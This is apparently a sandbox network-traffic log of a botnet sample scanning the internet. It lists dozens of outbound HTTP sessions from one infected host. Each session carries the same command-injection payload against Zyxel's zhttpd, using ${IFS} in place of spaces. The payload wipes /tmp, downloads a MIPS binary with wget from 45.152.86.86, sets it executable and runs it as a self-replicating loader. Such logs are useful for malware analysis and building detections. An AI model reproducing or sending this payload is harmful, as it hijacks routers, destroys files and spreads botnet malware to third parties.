                              Mar 31, 2024 08:41:25.823256016 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4126192.168.2.133397427.105.201.140443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823281050 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4127192.168.2.1340138130.67.90.165443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823316097 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4128192.168.2.133694049.156.228.21443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823383093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4129192.168.2.1357618126.125.212.227443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823415041 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4130192.168.2.133741497.159.9.113443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823457956 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4131192.168.2.135716050.242.1.194443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823478937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4132192.168.2.1336566171.81.153.135443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823544025 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4133192.168.2.1334586145.39.33.22443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823585987 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4134192.168.2.135178285.196.179.171443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823626995 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4135192.168.2.135622039.167.178.84443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823669910 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4136192.168.2.133468689.125.12.201443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823687077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4137192.168.2.1358992147.54.39.152443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823724985 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4138192.168.2.1350982111.32.183.219443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823765039 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4139192.168.2.1357600175.26.101.209443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823824883 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4140192.168.2.1344266223.52.247.66443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823857069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4141192.168.2.135376619.87.102.159443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823898077 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4142192.168.2.1345466149.60.163.187443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823956013 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4143192.168.2.1345972119.244.210.39443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.823998928 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4144192.168.2.135835263.242.124.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824037075 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4145192.168.2.134479636.20.35.207443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824071884 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4146192.168.2.1335102121.195.5.27443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824136019 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4147192.168.2.133644825.235.107.67443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824171066 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4148192.168.2.1341242165.205.158.181443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824232101 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4149192.168.2.1333110152.195.189.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824265957 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4150192.168.2.1336438223.240.38.128443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824291945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4151192.168.2.133954036.57.78.243443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824356079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4152192.168.2.1356308145.36.117.151443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824383020 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4153192.168.2.1347868102.123.82.0443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824435949 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4154192.168.2.13470809.58.53.249443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824460030 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4155192.168.2.1340794137.226.101.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824501991 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4156192.168.2.134781860.244.101.174443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824563980 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4157192.168.2.134661476.74.162.33443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824574947 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4158192.168.2.1360450148.169.219.17443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824603081 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4159192.168.2.133525090.132.193.88443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824637890 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4160192.168.2.1358036106.240.13.237443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824676037 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4161192.168.2.1347874119.146.109.252443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824714899 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4162192.168.2.1354322139.209.51.57443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824774027 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4163192.168.2.1341430176.2.108.208443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824790001 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4164192.168.2.1356932132.30.239.54443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824809074 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4165192.168.2.1351758118.40.36.213443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824845076 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4166192.168.2.1343226136.50.1.198443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824888945 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4167192.168.2.1348286160.161.71.5443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824934006 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4168192.168.2.1335810143.208.123.179443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.824975967 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4169192.168.2.134169880.187.118.15443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825017929 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4170192.168.2.135933250.43.76.7443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825071096 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4171192.168.2.1345320159.157.241.31443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825110912 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4172192.168.2.1335906193.109.77.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825135946 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4173192.168.2.1352946119.122.103.69443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825191975 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4174192.168.2.1338554132.155.156.93443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825227022 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4175192.168.2.1351668156.77.75.176443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825283051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4176192.168.2.13561145.160.112.250443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825305939 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4177192.168.2.13396908.129.110.99443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825349092 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4178192.168.2.135031812.78.141.105443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825393915 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4179192.168.2.13337648.250.83.16443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825444937 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4180192.168.2.1341366218.133.111.40443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825469017 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4181192.168.2.135045636.164.184.239443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825494051 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4182192.168.2.1349480156.182.61.233443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825550079 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4183192.168.2.1342062119.46.241.195443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825566053 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4184192.168.2.1341340103.229.26.190443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825630903 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4185192.168.2.1349958173.239.225.180443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825648069 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4186192.168.2.1360580165.223.70.72443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825684071 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4187192.168.2.1345932185.225.227.47443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825743914 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4188192.168.2.134096614.199.81.129443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825771093 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4189192.168.2.1337446159.215.47.212443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825820923 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4190192.168.2.134348667.34.184.2443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825856924 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4191192.168.2.1352756221.34.180.86443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825887918 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4192192.168.2.1355358143.211.162.144443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825920105 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4193192.168.2.1356126129.110.223.160443
                              TimestampBytes transferredDirectionData
                              Mar 31, 2024 08:41:25.825959921 CEST180OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*;${IFS}wget${IFS}http://45.152.86.86/mips;${IFS}chmod${IFS}777${IFS}mips;${IFS}./mips${IFS}zyxel.selfrep;


                              Session IDSource IPSource PortDestination IPDestination Port
                              4194192.168.2.134947214.39.110.93443
                              TimestampBytes transferredDirectionData
